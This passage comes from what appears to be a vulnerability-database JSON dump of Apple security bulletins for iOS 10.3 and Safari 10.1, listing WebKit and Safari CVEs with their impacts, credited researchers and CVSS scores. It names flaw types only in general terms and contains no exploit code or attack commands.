logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-01T06:52:17", "title": "About the security content of iOS 10.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2452", "CVE-2017-2423", "CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2397", "CVE-2017-2399", "CVE-2017-2461", "CVE-2017-2384", "CVE-2017-2434", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2412", "CVE-2017-2395", "CVE-2017-6976", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2380", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2400", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2376", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2364", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2453", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2404", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2424", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2393", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2414", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2398", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-08-01T06:52:17", "id": "APPLE:HT207617", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:37", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 10.1\n\nReleased March 27, 2017\n\n**CoreGraphics**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Chris Hlady of Google Inc, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com), Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Michal Zalewski of Google Inc, an anonymous researcher\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Login AutoFill**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A local user may be able to access locked keychain items\n\nDescription: A keychain handling issue was addressed through improved keychain item management.\n\nCVE-2017-2385: Simon Woodside of MedStack\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative \n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: an anonymous researcher\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2392: Max Bazaliy of Lookout\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7071: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative \n\nEntry added August 23, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Webkit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-29T02:51:42", "title": "About the security content of Safari 10.1 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2395", "CVE-2017-2444", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-7071", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2376", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2392", "CVE-2017-2453", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2424", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2476", "CVE-2017-2385"], "modified": "2017-08-29T02:51:42", "id": "APPLE:HT207600", "href": "https://support.apple.com/kb/HT207600", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T11:42:41", "description": "# About the security content of Safari 10.1\n\nThis document describes the security content of Safari 10.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 10.1\n\nReleased March 27, 2017\n\n**CoreGraphics**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Chris Hlady of Google Inc, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com), Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Michal Zalewski of Google Inc, an anonymous researcher\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Login AutoFill**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A local user may be able to access locked keychain items\n\nDescription: A keychain handling issue was addressed through improved keychain item management.\n\nCVE-2017-2385: Simon Woodside of MedStack\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative \n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, natashenka of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: 